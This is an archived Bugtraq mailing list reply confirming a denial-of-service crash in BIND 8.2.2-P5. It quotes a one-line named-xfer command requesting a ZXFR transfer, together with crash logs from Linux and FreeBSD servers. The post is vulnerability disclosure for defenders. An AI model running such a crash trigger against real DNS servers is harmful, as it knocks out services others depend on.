[17577] in bugtraq
Re: BIND 8.2.2-P5 Possible DOS
daemon@ATHENA.MIT.EDU (Walter Hop)
Thu Nov 9 03:43:07 2000
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Message-ID: <1254214870.20001108212511@skydancer.nl>
Date: Wed, 8 Nov 2000 21:25:11 +0100
Reply-To: Walter Hop <walter@SKYDANCER.NL>
From: Walter Hop <walter@SKYDANCER.NL>
X-To: "Fabio Pietrosanti (naif)" <naif@inet.it>
To: BUGTRAQ@SECURITYFOCUS.COM
In-Reply-To: <153031338.20001108210527@skydancer.nl>
[in reply to walter@skydancer.nl, 08-11-2000]
>> <naif@naif> [~/bind/src822p5/bin/named-xfer] $ ./named-xfer -z zone.pippo.com -d 9 -f pics -Z dns.pippo.com
> Yes; I got BIND-8.2.2-P5 on a RH5.2/Linux 2.0.38 box to die using the above
> command. These were the last log messages:
>
> Nov 8 20:36:06 cascade named[396]: unsupported XFR (type ZXFR) of
> "xxx.nl" (IN) to [xxx.xxx.xxx.xxx].4174
> Nov 8 20:36:55 cascade named[396]: db_freedata: DB_F_FREE set
> Nov 8 20:36:55 cascade named[396]: db_freedata: DB_F_FREE set
Now "BIND-8.2.2-P5-NOESW" on FreeBSD 3.4-RELEASE crashed too, with the
following log messages:
Nov 8 21:05:09 unity named[147]: db_freedata: d_rcnt != 0
Nov 8 21:05:09 unity /kernel: pid 147 (named), uid 53: exited on signal 6
Nov 8 21:05:09 unity named[147]: db_freedata: d_rcnt != 0
Strangely, this happens a few minutes _AFTER_ the evil named-xfer! In the
timespan between the DoS command and the crash, named functions as normal...
--
Walter Hop <walter@skydancer.nl> | +31 6 24290808 | PGP: 0xD4DD8DEB
Mail agreement-request@skydancer.nl to retrieve the email agreement.
